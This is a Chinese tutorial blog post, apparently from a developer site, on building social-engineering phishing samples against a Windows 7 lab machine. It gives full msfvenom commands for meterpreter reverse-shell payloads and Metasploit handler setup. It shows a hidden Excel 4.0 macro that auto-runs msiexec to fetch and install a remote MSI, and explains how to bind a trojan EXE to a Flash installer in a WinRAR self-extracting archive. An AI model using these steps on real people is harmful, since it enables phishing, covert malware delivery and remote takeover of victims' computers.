社工 钓鱼样本制作

靶机:32位windows7

攻击机:kali

一、制作恶意的excel钓鱼样本

1、在kali下,生成恶意 msi 文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP地址 lport=监听的端口 -f msi -o ok.msi

2、输入命令msfconsole,启动Metasploit 框架,建立监听,run后开始等待payload的连接

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.18.133

set lport 10000

run

3、python在具有恶意的msi的文件夹下开启http服务

python3 -m http.server 80

4、到windows7虚拟机下,新建一个.excel文件,在新建的excel文件的左下角Sheet1处右键,点击插入后,然后点击选择MS Excel 4.0 宏表,点击确定后成功加入宏表

5、在第一格处,输入=EXEC("msiexec /q /ihttp://192.168.18.133/ok.msi"),调用执行服务器上的msi文件

在第二格处,输入=HALT(),标识Excel 4.0宏结束

最后再重新点击第一格,然后在左上角A1模式处输入Auto_Open使excel打开时自动运行宏,再回车

在左下角宏1处点击右键,选择隐藏

按ctrl+s保存,在弹出的页面处点击选否,然后在弹出的另存为界面,点击选择保存类型为Excel启用宏的工作簿(*.xlsm),后点击保存

6、成功另存为一个.xlsm文件之后,点击打开,最后在提示界面宏已被禁用处,点击启用内容

7、最后回到kali,发现windows7已经可以成功连接上了

二、制作正常软件和恶意木马进行捆绑打包钓鱼样本

1、在kali里,生成恶意木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP地址 lport=监听的端口 -f exe -o okk.exe

2、在物理机里,复制生成的okk.exe恶意木马到和正常软件flash一起的目录下,然后ctrl点击连选这两个文件后进行捆绑压缩,右键在WinRAR下点击选择添加到压缩文件,然后在弹出的页面点击选择创建自解压格式压缩文件(X)

点击高级选项后,再点击自解压选项(X),然后在弹出来的页面常规框下的解压路径处,输入C:\windows\temp

点击设置,进入设置页面后,在解压后运行框下,输入解压后运行的恶意木马文件的文件名okk.exe和正常软件的文件名flashcenter_pp_ax_install_cn.exe

点击模块,在模块页面处,选择32位的Default32.SFX的自解压模块

最后一直点击确定,生成压缩好的带木马flash.exe文件

3、回到kali虚拟机下,输入命令msfconsole,启动Metasploit 框架,建立监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.18.133

set lport 10101

run

4、将压缩好的flash.exe恶意木马文件复制到windows7虚拟机下,后点击此文件,在弹出的页面处点击安装

5、最后回到kali虚拟机下,可以看到windows7已经成功连接上了

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值